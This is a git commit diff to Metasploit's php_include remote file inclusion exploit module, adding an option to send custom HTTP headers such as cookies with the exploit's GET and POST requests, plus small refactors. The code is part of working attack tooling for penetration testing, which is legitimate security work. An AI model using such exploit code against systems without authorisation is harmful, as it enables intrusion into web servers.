Merge branch 'php_include' of https://github.com/ethicalhack3r/metasploit-framework into ethicalhack3r-php_include

sinn3r · sinn3r · commit b657fd31ccf8 · 2012-10-09T00:45:46.000-05:00
diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb
@@ -1,5 +1,5 @@
 ##
-# $Id$
+# $Id: php_include.rb 14774 2012-02-21 01:42:17Z rapid7 $
 ##
 
 ##
@@ -29,7 +29,7 @@ def initialize(info = {})
 			},
 			'Author'         => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision$',
+			'Version'        => '$Revision: 14774 $',
 			#'References'     => [ ],
 			'Privileged'     => false,
 			'Payload'        =>
@@ -57,6 +57,7 @@ def initialize(info = {})
 			OptString.new('PATH', [ true , "The base directory to prepend to the URL to try", '/']),
 			OptString.new('PHPURI', [false, "The URI to request, with the include parameter changed to XXpathXX"]),
 			OptString.new('POSTDATA', [false, "The POST data to send, with the include parameter changed to XXpathXX"]),
+			OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""]),
 			OptPath.new('PHPRFIDB', [false, "A local file containing a list of URLs to try, with XXpathXX replacing the URL",
 				File.join(Msf::Config.install_root, "data", "exploits", "php", "rfi-locations.dat")
 				])
@@ -69,18 +70,27 @@ def check
 			uri.gsub!(/\?.*/, "")
 			print_status("Checking uri #{uri}")
 			response = send_request_raw({ 'uri' => uri})
-			if response.code == 200
-				return Exploit::CheckCode::Detected
-			end
+			return Exploit::CheckCode::Detected if response.code == 200
 			print_error("Server responded with #{response.code}")
 			return Exploit::CheckCode::Safe
 		else
 			return Exploit::CheckCode::Unknown
 		end
 	end
 
-	def php_exploit
+	def datastore_headers
+		headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
+		headers_hash = Hash.new
+		if (headers and ! headers.empty?)
+			headers.split(',').each do |header|
+				key,value = header.split(':')
+				headers_hash[key] = value.strip
+			end
+		end
+		headers_hash
+	end
 
+	def php_exploit
 		uris = []
 
 		tpath = datastore['PATH']
@@ -129,6 +139,7 @@ def php_exploit
 					response = send_request_raw( {
 						'global' => true,
 						'uri'    => tpath+uri,
+						'headers' => datastore_headers,
 					}, timeout)
 				elsif http_method == "POST"
 					response = send_request_raw(
@@ -137,11 +148,10 @@ def php_exploit
 							'uri'     => tpath+uri,
 							'method'  => http_method,
 							'data'    => postdata,
-							'headers' =>
-							{
+							'headers' => datastore_headers.merge({
 								'Content-Type'   => 'application/x-www-form-urlencoded',
-								'Content-Length' => postdata.length,
-							}
+								'Content-Length' => postdata.length
+							})
 						}, timeout)
 				end
 				handler
